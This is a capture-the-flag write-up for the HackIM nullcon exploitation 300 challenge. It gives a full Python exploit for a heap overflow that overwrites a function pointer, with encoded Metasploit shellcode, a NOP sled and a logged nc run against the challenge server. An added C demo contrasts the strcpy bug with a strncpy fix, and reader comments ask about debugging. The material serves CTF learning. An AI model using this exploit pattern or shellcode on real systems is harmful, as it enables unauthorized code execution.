HackIM nullcon exploitation 300 write-up
binary :
#!/usr/bin/env python3
import struct

# createheap -> allocate_big_heap -> strcpy -> deleteheap(vtable)
# simple function pointer overwrite
# heap overflow

"""
/*
 * linux/x86/read_file - 97 bytes
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * VERBOSE=false, PrependSetresuid=false,
 * PrependSetreuid=false, PrependSetuid=false,
 * PrependSetresgid=false, PrependSetregid=false,
 * PrependSetgid=false, PrependChrootBreak=false,
 * AppendExit=false, PATH=flag.txt, FD=4
 */
"""
shellcode = (b"\xb8\xf6\x7e\xa8\x82\xdd\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
             b"\x12\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x14\x8b\x43\xb4\x60"
             b"\x71\x94\xb9\x90\x21\xa5\x70\x5d\x55\x4c\x41\xe5\x55\x4f\x46"
             b"\x15\xd3\xa8\xcf\xec\x59\x36\xc0\x0e\x9e\xfa\x60\x87\x5c\xbc"
             b"\x65\x97\x60\xbd\xde\x93\x60\xbd\x20\x56\xe0\x05\x21\x68\xe1"
             b"\x75\x99\x68\xe1\x75\xdd\xa5\x61\x9d\x18\xca\x9d\xa1\xc5\x58"
             b"\x03\x39\x24\xd4\xbb\xb1\x38")

# pack a 32-bit little-endian value (the format string was garbled in the posted copy)
p = lambda x: struct.pack("<I", x)

pr = 0x080487e8  # value written over the function pointer


def createheap():
    # create heap
    payload = b"CR"
    payload += b"A" * 38
    payload += p(0x64)
    payload += b"\n"
    return payload


def deleteheap():
    # delete heap: the 2-byte command slot carries a short jump (eb 50)
    # that lands inside the NOP sled in front of the shellcode
    # payload = b"DE"
    payload = b"\xeb\x50"  # short jump
    payload += b"\x90" * 38
    payload += p(0x32)
    payload += b"\x90" * 0x50
    payload += shellcode
    payload += b"\n"
    return payload


def biggheap(size):
    # allocate big heap
    payload = b"RE"
    payload += b"A" * 38
    payload += p(0xc8)
    payload += b"A" * 36
    payload += p(size)
    payload += b"\n"
    payload += b"B" * (size - 4 - 4)
    payload += p(pr)  # ret here
    payload += b"\n"
    return payload


def overflow():
    # leads to the buffer overflow
    payload = b"CP"
    payload += b"A" * 38
    payload += p(0x12c)
    payload += b"\n"
    return payload


exploit = b""
exploit += createheap()
exploit += biggheap(0x110)
exploit += overflow()
exploit += deleteheap()  # triggers the vuln

# print(exploit)

with open("ex3.txt", "wb") as f:
    f.write(exploit)

"""
root@ubuntu:/home/sweetchip/Desktop/cyber/ncon# (cat a.txt) | nc 23.23.190.205 8888
637c0c259175d230b08e3e589278ceeb
"""
Analyze the binary, trigger the heap overflow, overwrite the function table, and get the program to call the overwritten address. The exploit code above does exactly that.
flag : 637c0c259175d230b08e3e589278ceeb
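To make the chain in the script's comments concrete (a big buffer allocated in front of the object that holds the function pointer, an unbounded strcpy into that buffer, and a delete handler that calls the pointer), here is an added C example that models the bug class next to its fix. It is not the challenge binary's code and not the author's: the struct layout, field names, BIG_SIZE, the helper names (init_model, vuln_store, safe_store, pointer_clobbered, build_payload, demo) and the 0x41-filled target address are all assumptions chosen for the demo.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Demo of the bug class used in the write-up, NOT the challenge binary's code.
 * Assumed for illustration: a "big heap" text buffer sits directly in front of
 * a record that holds a function pointer; the server copies attacker text into
 * the buffer with strcpy() and no length check; the "delete" handler later
 * calls the pointer. Field names and sizes are made up for the demo.
 */

#define BIG_SIZE 32                 /* the real exploit used a 0x110-byte chunk */

struct record {
    char name[8];
    uint32_t size;
    void (*on_delete)(struct record *);   /* what the exploit overwrites */
};

/* two adjacent heap chunks modelled as one contiguous object */
struct heap_model {
    char big[BIG_SIZE];
    struct record rec;
};

/* room for the model plus the overflow tail written by the demo payload */
#define MEM_SIZE (sizeof(struct heap_model) + 16)

static void real_delete(struct record *r) { (void)r; }

/* Place a fresh model at the start of mem; mem must hold MEM_SIZE bytes. */
static void init_model(unsigned char *mem) {
    struct heap_model m;
    memset(&m, 0, sizeof m);
    memcpy(m.rec.name, "obj", 4);
    m.rec.size = 0x64;
    m.rec.on_delete = real_delete;
    memset(mem, 0, MEM_SIZE);
    memcpy(mem, &m, sizeof m);
}

/* Vulnerable handler: the write-up's strcpy step, no bound on the copy. */
static void vuln_store(unsigned char *mem, const char *input) {
    strcpy((char *)mem, input);          /* mem is the start of model.big */
}

/* Hardened handler: the copy can never leave the big buffer. */
static void safe_store(unsigned char *mem, const char *input) {
    strncpy((char *)mem, input, BIG_SIZE - 1);
    mem[BIG_SIZE - 1] = '\0';
}

/* 1 if the record's function pointer no longer points at real_delete. */
static int pointer_clobbered(const unsigned char *mem) {
    struct heap_model m;
    memcpy(&m, mem, sizeof m);           /* read the fields back through memcpy */
    return m.rec.on_delete != real_delete;
}

/*
 * Build the same payload shape as biggheap(): filler up to the function
 * pointer, then the target value in native byte order (what struct.pack("<I")
 * produces on x86). Returns the length without the terminating NUL, or 0 if
 * the payload does not fit in out.
 */
static size_t build_payload(char *out, size_t outlen, uintptr_t target) {
    size_t off = offsetof(struct heap_model, rec) + offsetof(struct record, on_delete);
    if (off + sizeof target + 1 > outlen)
        return 0;
    memset(out, 'B', off);
    memcpy(out + off, &target, sizeof target);
    out[off + sizeof target] = '\0';
    return off + sizeof target;
}

/* Runs the scenario; returns 1 if on_delete was hijacked, 0 if it survived. */
int demo(int hardened) {
    unsigned char mem[MEM_SIZE];
    char payload[MEM_SIZE];
    uintptr_t target;

    /* fake target address with no zero bytes, so strcpy copies all of it */
    memset(&target, 0x41, sizeof target);
    if (build_payload(payload, sizeof payload, target) == 0)
        return -1;

    init_model(mem);
    if (hardened)
        safe_store(mem, payload);
    else
        vuln_store(mem, payload);
    return pointer_clobbered(mem);
}

int main(void) {
    printf("strcpy  : on_delete clobbered = %d\n", demo(0));
    printf("strncpy : on_delete clobbered = %d\n", demo(1));
    return 0;
}
```

demo(0) returns 1 and demo(1) returns 0. The payload builder mirrors biggheap(): filler up to the pointer's offset, then the target bytes, which is why the script packs pr with a little-endian 32-bit pack. Because the copy is strcpy-based, a NUL byte in the target address or in the shellcode would have cut the write short, so the exploit has to keep both NUL-free.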
Hello. I got stuck while working on this problem, so I'm leaving a comment haha
I'd like to do dynamic analysis with gdb, but how do you attach to a problem like this dynamically?
Unlike the other problems, the binary doesn't even contain socket code, so I'm not sure what to do ㅜㅜ
I'll be waiting for your reply :D
If you want to analyze it locally or run it remotely, please refer to http://research.hackerschool.org/Datas/Research_Lecture/remote1.txt
There is also a remote2.txt.
A reply at this hour... thank you ^^
Hello. There's something I don't understand, so I'm asking a question.
In biggheap, I'm curious how you found the part that overwrites v8 in malloc(v8). No matter how much I look in IDA, I can't figure out how to find the part that overwrites v8..